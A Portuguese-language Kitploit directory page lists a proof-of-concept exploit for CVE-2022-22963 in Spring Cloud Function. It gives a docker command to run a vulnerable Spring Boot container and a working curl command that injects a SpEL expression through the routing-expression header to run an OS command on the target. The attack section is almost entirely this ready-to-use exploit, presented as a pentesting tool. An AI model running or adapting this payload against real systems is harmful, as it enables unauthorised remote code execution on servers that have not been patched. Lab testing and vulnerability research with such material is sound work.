Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22963 — Exploit de prova de conceito para CVE-2022-22963 (Spring4Shell) com um contêiner Docker vulnerável e execução remota de código baseada em curl através de expressões de roteamento do Spring Cloud Function. | Kitploit
Ferramentas/GitHubGitHub/darryk10/cve-2022-22963
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubdarryk10/cve-2022-22963

CVE-2022-22963

Exploit de prova de conceito para CVE-2022-22963 (Spring4Shell) com um contêiner Docker vulnerável e execução remota de código baseada em curl através de expressões de roteamento do Spring Cloud Function.

Ver Repositório
34162há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-22963 - Spring4shell

Para executar a aplicação SpringBoot vulnerável, execute este contêiner docker expondo-o na porta 8080. Exemplo:

root@kitploit:~
docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Comando Curl:

root@kitploit:~
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

Ou usando o Burp suite:

Burpsuite

Créditos

https://github.com/hktalent/spring-spel-0day-poc

Baixar ferramenta